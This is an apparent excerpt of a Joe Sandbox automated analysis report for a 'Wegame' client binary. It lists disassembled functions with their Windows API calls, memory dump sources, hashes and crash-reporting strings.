                                                                • Instruction Fuzzy Hash: DAB09222B8943402C66915A83C4279A8244EB49E62B12012AEB06E7088CA448A4202D6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD02DCB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemInfo.KERNEL32(?), ref: 6BD02DD5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: InfoSystem
                                                                • String ID:
                                                                • API String ID: 31276548-0
                                                                • Opcode ID: e2b8090cf334da1b72601d9919bf04af8755cdfc4028b7fdb245a47ac3fae32d
                                                                • Instruction ID: 10eba14eac2be24f4c750a095a9aaad0f1a30e29746eb409f2295c561a3224f7
                                                                • Opcode Fuzzy Hash: e2b8090cf334da1b72601d9919bf04af8755cdfc4028b7fdb245a47ac3fae32d
                                                                • Instruction Fuzzy Hash: EFC04CB9944209DBCF04FFA5C98999B77FCBA09204B500661D916E3340EB70E949CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD94F45 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 6BD95262: __EH_prolog3.LIBCMT ref: 6BD95269
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(?,?), ref: 6BD94F54
                                                                  • Part of subcall function 6BD95CE6: __EH_prolog3_GS.LIBCMT ref: 6BD95CF0
                                                                  • Part of subcall function 6BD95CE6: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD95CFF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@?report@H_prolog3H_prolog3_Logger@1@Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@Qos_occasion@234@@
                                                                • String ID:
                                                                • API String ID: 4155978998-0
                                                                • Opcode ID: 664c15afcd16b33eb5d84ecb2b164faac36f646f1b22748259d6e1aecb353c72
                                                                • Instruction ID: 6b31776544b85c381cba6ec6b7f656a96ae1df4ae27602ca9d99325c67ea31d1
                                                                • Opcode Fuzzy Hash: 664c15afcd16b33eb5d84ecb2b164faac36f646f1b22748259d6e1aecb353c72
                                                                • Instruction Fuzzy Hash: 2AB09B651055205A4B1137307D014D977559F4121D3058065ED015A11487159F9746F0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BF703F0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ioctlsocket.WS2_32(6BF6F9D8,8004667E,00000000), ref: 6BF70406
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ioctlsocket
                                                                • String ID:
                                                                • API String ID: 3577187118-0
                                                                • Opcode ID: 5e0365525004fda465add4ecb9850efe7f41c9a3830667bfbfaf4b4992009b98
                                                                • Instruction ID: 413fd68221da14d64861f5acc95d909b4e14d32444096749d186413393c5800a
                                                                • Opcode Fuzzy Hash: 5e0365525004fda465add4ecb9850efe7f41c9a3830667bfbfaf4b4992009b98
                                                                • Instruction Fuzzy Hash: 95C00275408206BF8B019F50C94485ABBE5EB84355F10C929B58991130E731E454CB06
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD23D1C Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?CreateWndImpl@WndMsgReceiver@Tenio@@IAEPAUHWND__@@PBDP6GJPAU3@IIJ@Z@Z.COMMON(?,6BD23E81), ref: 6BD23D27
                                                                  • Part of subcall function 6BD23D44: memset.VCRUNTIME140(?,00000000,00000100), ref: 6BD23D70
                                                                  • Part of subcall function 6BD23D44: strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000100,?), ref: 6BD23D89
                                                                  • Part of subcall function 6BD23D44: CreateWindowExA.USER32(00000000,static,?,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 6BD23DC5
                                                                  • Part of subcall function 6BD23D44: SetLastError.KERNEL32(00000000), ref: 6BD23DD3
                                                                  • Part of subcall function 6BD23D44: SetWindowLongA.USER32(00000000,000000FC,?), ref: 6BD23DDD
                                                                  • Part of subcall function 6BD23D44: GetLastError.KERNEL32 ref: 6BD23DF0
                                                                  • Part of subcall function 6BD23D44: SetLastError.KERNEL32(00000000), ref: 6BD23DF8
                                                                  • Part of subcall function 6BD23D44: SetWindowLongA.USER32(00000000,000000EB), ref: 6BD23E02
                                                                  • Part of subcall function 6BD23D44: GetLastError.KERNEL32 ref: 6BD23E0C
                                                                  • Part of subcall function 6BD23D44: DestroyWindow.USER32(00000000), ref: 6BD23E13
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastWindow$CreateLong$D__@@DestroyImpl@Receiver@Tenio@@memsetstrcpy_s
                                                                • String ID:
                                                                • API String ID: 1278412074-0
                                                                • Opcode ID: 029ea40e00dd6e2d860acd9029da9fe0b3f4b62a2e82c631fb7f5399e9e20a2b
                                                                • Instruction ID: de1b14d60f56c44c75b3fb4bacf0a7422cdc3a4184c1ab61f2563438cace2958
                                                                • Opcode Fuzzy Hash: 029ea40e00dd6e2d860acd9029da9fe0b3f4b62a2e82c631fb7f5399e9e20a2b
                                                                • Instruction Fuzzy Hash: 38B0123140014C3B49101751DC01C0ABA1C47106787004121BB080C020863665A690B8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1001C4CC Relevance: 1.3, APIs: 1, Instructions: 56memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • HeapAlloc.KERNEL32(00000008,?,00000000,00000000,?,1001CE96,00000001,00000074,?,1001E39D,?,?,?,1001DE15,10019AFD,?), ref: 1001C521
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338444411.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000003.00000002.3338431891.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338466811.0000000010028000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338481780.000000001002C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338495282.000000001002D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338508628.0000000010032000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_10000000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AllocHeap
                                                                • String ID:
                                                                • API String ID: 4292702814-0
                                                                • Opcode ID: 60d4063f3425b058b4fddaae294e715eae1d76beb93be31f8a337db48f4b6848
                                                                • Instruction ID: cf3c69d64b696c2aca4b590771c6cf1581cdf61a2ac28e86295af74e7a3dc965
                                                                • Opcode Fuzzy Hash: 60d4063f3425b058b4fddaae294e715eae1d76beb93be31f8a337db48f4b6848
                                                                • Instruction Fuzzy Hash: 6F014C37A40A2817E311D2281C85F5F3296DB81AF1F270135FD54AF1D2EA70FDC14691
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043A5F0 Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140(00000001,0000000F,00000001,?,?,?,?,00437597,00000004,00000000), ref: 0043A636
                                                                  • Part of subcall function 0043AF50: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,00000001,00000001,0000000F), ref: 0043B01A
                                                                  • Part of subcall function 0043AF50: memset.VCRUNTIME140(00000010,00000001,00000001,00000000,7FFFFFFF,00000000,00000001,00000001,0000000F), ref: 0043B028
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$memmove
                                                                • String ID:
                                                                • API String ID: 3527438329-0
                                                                • Opcode ID: e728354fedcdb21e44f816775a5afb12385b2916075195d7c4d6166d4614394c
                                                                • Instruction ID: 1bb585db8e36a5a5ca42a448406213dbacb29c970ab1b00d26ed1f949447914b
                                                                • Opcode Fuzzy Hash: e728354fedcdb21e44f816775a5afb12385b2916075195d7c4d6166d4614394c
                                                                • Instruction Fuzzy Hash: CE012833240150AFDB149E19EC40AAABB59FBD6718F34806FE5944F242C676D852C7A9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD0F200 Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140(00000000,?,?,?,?,?), ref: 6BD0F246
                                                                  • Part of subcall function 6BD0FD30: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000,0000000F), ref: 6BD0FDFA
                                                                  • Part of subcall function 6BD0FD30: memset.VCRUNTIME140(00000010,?,00000000,00000000,7FFFFFFF,00000000,?,00000000,0000000F), ref: 6BD0FE08
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$memmove
                                                                • String ID:
                                                                • API String ID: 3527438329-0
                                                                • Opcode ID: 6a4bc1ef0bea8c254fde8ea13dc91ab50ae047e0adbae628575e3139394d657f
                                                                • Instruction ID: 2ccff631d21b9dfab48d01e064e6746d4201a38227f700418bfb7b3e5ed94a8e
                                                                • Opcode Fuzzy Hash: 6a4bc1ef0bea8c254fde8ea13dc91ab50ae047e0adbae628575e3139394d657f
                                                                • Instruction Fuzzy Hash: 3A012833200154AFD7048FB8EC40AAABB59FBD2668F30806AE5588F241C776D543C3B5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BE26060 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 6BE24EC0: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 6BE24F64
                                                                  • Part of subcall function 6BE24EC0: CloseHandle.KERNEL32(00000000), ref: 6BE24F79
                                                                  • Part of subcall function 6BE24EC0: ResetEvent.KERNEL32(00000000), ref: 6BE24F83
                                                                  • Part of subcall function 6BE24EC0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 6BE24FED
                                                                • TlsSetValue.KERNEL32(00000031,?), ref: 6BE260AA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Event$CloseCreateHandleOpenResetValue
                                                                • String ID:
                                                                • API String ID: 3980803231-0
                                                                • Opcode ID: 0fec71ba128a8aa503668477121c5da1d2abf411f128204d1d501428bc7903e3
                                                                • Instruction ID: 14bb16452ffb9e24989cbc2693587c81f9117ef67a2a7663bf2aede62cdc92ac
                                                                • Opcode Fuzzy Hash: 0fec71ba128a8aa503668477121c5da1d2abf411f128204d1d501428bc7903e3
                                                                • Instruction Fuzzy Hash: E501A272A00104AFCB10DF59DD05F5ABBF8FB4A234F20476AF925D3790DB35A9008BA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD9B397 Relevance: 1.3, APIs: 1, Instructions: 20sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(00000064), ref: 6BD9B3C2
                                                                  • Part of subcall function 6BD9B8BA: Sleep.KERNEL32(00000064), ref: 6BD9B948
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: ec6fbcc75c87c865135596c0043644301cf3f37b2238ac86dbfaa1befad1c3a6
                                                                • Instruction ID: d60fd1e6308254f696d772223873ad9ac2586bfebe28cd52705836bc89ce6967
                                                                • Opcode Fuzzy Hash: ec6fbcc75c87c865135596c0043644301cf3f37b2238ac86dbfaa1befad1c3a6
                                                                • Instruction Fuzzy Hash: F4D01731A94634E5DB04B7B834167E923465B46A78F02008AD5401E1C4CB6945875BB2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD08980 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BD0898B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: malloc
                                                                • String ID:
                                                                • API String ID: 2803490479-0
                                                                • Opcode ID: e63ee3d4b2af59589055b1da55d61cb1358001cca35225f58a9d8049473eb959
                                                                • Instruction ID: d9fc55d1911c32eae54eea48c5a377ed55d55e7bb365bb5d374dd091a8e90d15
                                                                • Opcode Fuzzy Hash: e63ee3d4b2af59589055b1da55d61cb1358001cca35225f58a9d8049473eb959
                                                                • Instruction Fuzzy Hash: 9DC02B3200030C47CF00DF88D845806739CAA80114B044010F80C8B111C130F1348741
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 0045EA47 Relevance: 137.4, APIs: 49, Strings: 29, Instructions: 909COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0045EA51
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(000002D4), ref: 0045EA63
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(000002D4), ref: 0045EAD8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,000002D4), ref: 0045EB48
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,000002D4), ref: 0045EB54
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045EB7A
                                                                • ?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ.ADAPT_FOR_IMPORTS ref: 0045EB9E
                                                                • ?AddCrashReportHelperFile@CrashReportLoader@crash_report@@QAEHPB_W00K@Z.ADAPT_FOR_IMPORTS(?,00000000,extra file,00000003), ref: 0045EBBE
                                                                • ?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ.ADAPT_FOR_IMPORTS ref: 0045EBD9
                                                                • ?AddCrashReportHelperFile@CrashReportLoader@crash_report@@QAEHPB_W00K@Z.ADAPT_FOR_IMPORTS(?,00000000,extra file,00000003), ref: 0045EBF1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CrashReport$?get_log_instance@base@@Loader@crash_report@@Logger@1@$File@HelperInstance@V12@$H_prolog3H_prolog3_catch_SimpleString::operator=
                                                                • String ID: )$CrashCount$CrashSignature$ExceptionAddress$ExceptionFirstUserModuleName$WeGame$[CrashCallBackFun]CallBackFun pinfo is null$[CrashCallBackFun]CallBackFun: stage={}$[CrashCallBackFun]ExceptionAddress: {}$[CrashCallBackFun]ExceptionFirstUserModuleName: {}$[CrashCallBackFun]Fail to launch repair_prompt, err:%d$[CrashCallBackFun]crash report file not exist, file:{}$[CrashCallBackFun]crash_signature: {}$[CrashCallBackFun]launching repair_prompt$[CrashCallBackFun]launching repair_prompt succ$[CrashCallBackFun]netbar%d or dev%d do not launch repair_prompt$[CrashCallBackFun]parse json failed$[CrashCallBackFun]read file failed, file:{}$[CrashCallBackFun]unhandled exception, exception_code:{} exception_type:{}, exception folder:{}, process_handle:{}$[TGP]do not report qos.$\crashrpt.json$\tinyget\wegame.tinyget.*.log$\wegame.*.log$crash_log.rs$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$extra file$got crash_count:%d before$repair_prompt.exe$user_data.update.update_method
                                                                • API String ID: 2294833470-2301710027
                                                                • Opcode ID: 0cd6a7f1a489f10f835650498419a703f04c7f1016c6dd8fc5ef5947e1ec61ed
                                                                • Instruction ID: 75086a895868c6992bdcc55cd50b23bba6b859301609c29a41ac6891653c997b
                                                                • Opcode Fuzzy Hash: 0cd6a7f1a489f10f835650498419a703f04c7f1016c6dd8fc5ef5947e1ec61ed
                                                                • Instruction Fuzzy Hash: AE828F70D40248EADF14EBA5CC99BDEB774AF15308F2040AEE40567292EB785F49CF99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004062C0 Relevance: 72.5, APIs: 34, Strings: 6, Instructions: 2506COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 004063AF
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 0040640D
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 0040663D
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 004066A3
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040686E
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,?), ref: 004068C2
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004069EC
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00406A50
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00406AE4
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00406B58
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00406C14
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00406DFD
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00406EB9
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040705D
